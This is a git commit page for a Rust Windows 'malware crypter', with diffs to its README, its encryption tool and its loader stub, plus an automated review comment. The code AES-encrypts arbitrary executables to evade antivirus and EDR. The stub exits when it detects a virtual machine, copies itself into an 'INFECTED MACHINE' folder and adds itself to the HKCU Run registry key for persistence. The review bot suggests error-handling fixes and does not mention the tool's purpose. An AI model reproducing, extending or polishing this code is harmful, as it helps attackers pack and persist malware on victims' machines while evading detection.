Add the ability to pass the EXE name as a command-line argument. I like this better than having a hardcoded EXE name.

This commit is contained in:
mitch edwards // valhalla_dev 2024-07-15 10:43:28 -05:00
parent b549c514e9
commit ba8d0feeb9
4 changed files with 32 additions and 32 deletions

.gitignore vendored Normal file

@ -0,0 +1 @@
**/target/**


@ -2,8 +2,8 @@
x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexec x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexec
## Usage ## Usage
1. Put your Portable Executable in /crypt/ and rename it to example.exe (or change the code to be the same name as your PE) 1. Put your Portable Executable in /crypt/
2. In /crypt/ `cargo run` 2. In /crypt/ `cargo run <name_of_pe.exe>`
(will output encrypted_bytes.bin and key.txt) (will output encrypted_bytes.bin and key.txt)
3. move encrypted_bytes.bin and key.txt to /stub/src/ 3. move encrypted_bytes.bin and key.txt to /stub/src/
4. In /stub/ `cargo build --target x86_64-pc-windows-gnu --release` or build without `--release` to keep debug symbols 4. In /stub/ `cargo build --target x86_64-pc-windows-gnu --release` or build without `--release` to keep debug symbols
@ -24,7 +24,7 @@ x86-64 Malware Crypter built in Rust for Windows with Anti-VM, powered by memexe
- Obfuscated Strings - Obfuscated Strings
## Disclaimer ## Disclaimer
This is a tool used to test the Dynamic detection capabilites of AV and EDR, use of this project is at your own risk This is a tool used to test the Static + Dynamic detection capabilites of AV and EDR, use of this project is at your own risk
## MITRE TTPs (Indicators) ## MITRE TTPs (Indicators)
- User Execution: Malicious File T1204.002 - User Execution: Malicious File T1204.002


@ -1,17 +1,23 @@
use aes::cipher::{generic_array::GenericArray, BlockEncrypt, KeyInit};
use aes::Aes128; use aes::Aes128;
use aes::cipher::{ use rand::rngs::StdRng;
BlockEncrypt, KeyInit, use rand::{RngCore, SeedableRng};
generic_array::GenericArray,
};
use std::fs::read; use std::fs::read;
use std::fs::File; use std::fs::File;
use std::io::prelude::*; use std::io::prelude::*;
use rand::rngs::StdRng;
use rand::{RngCore, SeedableRng};
fn main() -> std::io::Result<()> { fn main() -> std::io::Result<()> {
// Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder
let plaintext_bytes = read("hexowl.exe").expect("Failed to read file"); let args: Vec<String> = std::env::args().collect();
if args.len() < 2 {
println!("Run with {} <inputfile.exe>", args.get(0).unwrap());
return Err(std::io::Error::new(
std::io::ErrorKind::NotFound,
"file input not found",
));
}
let fname = args.get(1).unwrap();
let plaintext_bytes = read(fname).expect("Failed to read file");
let mut encrypted_file = File::create("encrypted_Input.bin")?; let mut encrypted_file = File::create("encrypted_Input.bin")?;
let mut key_file = File::create("key.txt")?; let mut key_file = File::create("key.txt")?;
@ -43,4 +49,4 @@ fn main() -> std::io::Result<()> {
encrypted_file.write_all(&enc_bytes)?; encrypted_file.write_all(&enc_bytes)?;
key_file.write_all(&key)?; key_file.write_all(&key)?;
Ok(()) Ok(())
} }
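Review bot: The comment at the top of main (`// Read input file into a vector RENAME example.exe to what you want ...`) still tells the user to rename the PE to example.exe, which this commit makes obsolete now that the path comes from argv; replace it with `// Path of the PE to encrypt is taken from argv[1]; see README "Usage".`. The missing-argument branch returns `ErrorKind::NotFound`, which describes a file that was looked up and not found rather than an argument that was never supplied — `ErrorKind::InvalidInput` is the accurate kind, and the usage line should go to stderr via `eprintln!` so it is not mixed into stdout. `read(fname).expect("Failed to read file")` panics on a missing or unreadable input even though main already returns `io::Result`; `let plaintext_bytes = read(fname)?;` keeps the error path uniform and surfaces the OS error text. Separately, the README hunk on this page says this step outputs encrypted_bytes.bin while the code still creates `encrypted_Input.bin`, so the next step that moves the file by name may not line up — worth confirming which name is intended.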


@ -1,27 +1,20 @@
use aes::cipher::{generic_array::GenericArray, BlockDecrypt, KeyInit};
use aes::Aes128; use aes::Aes128;
use aes::cipher::{BlockDecrypt, KeyInit,
generic_array::GenericArray,
};
use inside_vm::inside_vm; use inside_vm::inside_vm;
use std::process::Command;
use std::{fs, env};
use std::io::{Read, Cursor, self};
use std::io::Result; use std::io::Result;
use std::io::{self, Cursor, Read};
use std::path::Path; use std::path::Path;
use std::process::Command;
use std::{env, fs};
use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS}; use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS};
use winreg::RegKey; use winreg::RegKey;
fn main() { fn main() {
if inside_vm() {
if inside_vm(){
println!("This is in a vm"); println!("This is in a vm");
std::process::exit(0); std::process::exit(0);
} else { } else {
println!("NO VM"); println!("NO VM");
create_infected_directory(); create_infected_directory();
@ -43,7 +36,7 @@ fn decrypt_file() -> Result<Vec<u8>> {
let key = GenericArray::from(key_bytes); let key = GenericArray::from(key_bytes);
let cipher = Aes128::new(&key); let cipher = Aes128::new(&key);
// Decrypt the encrypted bytes in blocks // Decrypt the encrypted bytes in blocks
let mut decrypted_bytes = Vec::new(); let mut decrypted_bytes = Vec::new();
for block in encrypted_bytes.chunks(16) { for block in encrypted_bytes.chunks(16) {
let mut block_array = GenericArray::clone_from_slice(block); let mut block_array = GenericArray::clone_from_slice(block);
@ -54,9 +47,9 @@ fn decrypt_file() -> Result<Vec<u8>> {
// Unpad the decrypted bytes // Unpad the decrypted bytes
let padding_size = decrypted_bytes.last().unwrap().clone() as usize; let padding_size = decrypted_bytes.last().unwrap().clone() as usize;
let decrypted_bytes = (&decrypted_bytes[..decrypted_bytes.len() - padding_size]).to_vec(); let decrypted_bytes = (&decrypted_bytes[..decrypted_bytes.len() - padding_size]).to_vec();
// return decrypted bytes // return decrypted bytes
Ok(decrypted_bytes, ) Ok(decrypted_bytes)
} }
fn create_infected_directory() -> io::Result<()> { fn create_infected_directory() -> io::Result<()> {
@ -64,9 +57,8 @@ fn create_infected_directory() -> io::Result<()> {
fs::create_dir_all(&infected_dir)?; fs::create_dir_all(&infected_dir)?;
let current_exe = env::current_exe()?; let current_exe = env::current_exe()?;
let current_exe_filename = current_exe let current_exe_filename = current_exe.file_name();
.file_name();
let infected_exe_path = infected_dir.join(current_exe_filename.unwrap()); let infected_exe_path = infected_dir.join(current_exe_filename.unwrap());
fs::copy(&current_exe, &infected_exe_path)?; fs::copy(&current_exe, &infected_exe_path)?;
@ -85,17 +77,18 @@ fn create_infected_directory() -> io::Result<()> {
} }
fn persistence() -> io::Result<()> { fn persistence() -> io::Result<()> {
if let Ok(current_exe) = env::current_exe() { if let Ok(current_exe) = env::current_exe() {
if let Some(file_name) = current_exe.file_stem() { if let Some(file_name) = current_exe.file_stem() {
let executable_name = file_name.to_string_lossy(); let executable_name = file_name.to_string_lossy();
let directory_path = "C:/Rust Crypter - INFECTED MACHINE/"; let directory_path = "C:/Rust Crypter - INFECTED MACHINE/";
let file_path = format!("{}{}.exe", directory_path, executable_name); let file_path = format!("{}{}.exe", directory_path, executable_name);
// Open the "Run" registry key // Open the "Run" registry key
let hkcu = RegKey::predef(HKEY_CURRENT_USER); let hkcu = RegKey::predef(HKEY_CURRENT_USER);
let run_key = hkcu.open_subkey_with_flags("Software\\Microsoft\\Windows\\CurrentVersion\\Run", KEY_ALL_ACCESS)?; let run_key = hkcu.open_subkey_with_flags(
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
KEY_ALL_ACCESS,
)?;
// Add the executable path to the "Run" registry key // Add the executable path to the "Run" registry key
run_key.set_value("RustCrypter", &file_path).err(); run_key.set_value("RustCrypter", &file_path).err();